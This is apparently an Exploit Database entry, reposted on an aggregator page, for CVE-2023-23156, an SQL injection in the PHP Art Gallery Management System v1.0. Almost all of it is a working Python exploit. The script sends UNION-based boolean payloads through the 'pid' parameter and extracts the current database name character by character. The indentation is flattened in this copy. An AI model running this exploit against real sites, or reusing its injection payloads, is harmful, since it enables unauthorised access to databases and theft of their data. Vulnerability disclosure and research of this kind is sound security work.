Art Gallery Management System Project in PHP v 1.0 – SQL injection

• Exploit Database
• 15 阅读

• 作者： Yogesh Verma
  日期： 2023-04-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51272/

• # Exploit Title: Art Gallery Management System Project in PHP v 1.0 - SQL injection
  # Date: 31-01-2023
  # Exploit Author: Yogesh Verma
  # Vendor Homepage: https://y0gesh-verma.github.io/
  # Software Link: https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/, https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip
  # Version: 1.0
  # Tested on: Windows/Linux
  # CVE : CVE-2023-23156
  
  
  
  #!/usr/bin/python
  import sys
  import requests
  
  tmp = requests.Session()
  db_name = ""
  database = ""
  if len(sys.argv) == 2:
  url = sys.argv[1]
  for i in range(1, 7):
  for j in range(32, 126):
  sql_payload = f"'UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,(select*from(select (ascii(substr(database(),{i},1))={j}))a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL'"
  data = {'pid': '-1' + sql_payload}
  r = tmp.get(url, params=data)
  if "Dimension : 1" in r.text:
  db_name += chr(j)
  database += db_name
  if len(db_name)>1:
  print('\n'+"Fetching current database :")
  print(database)
  print('\n'+"vulnerable to CVE-2023-23156")
  else:
  print("Not vulnerable to CVE-2023-23156")
  else:
  print("Error: Please provide the URL as an argument.")
  print("Example: script.py https://example.com/single-product.php")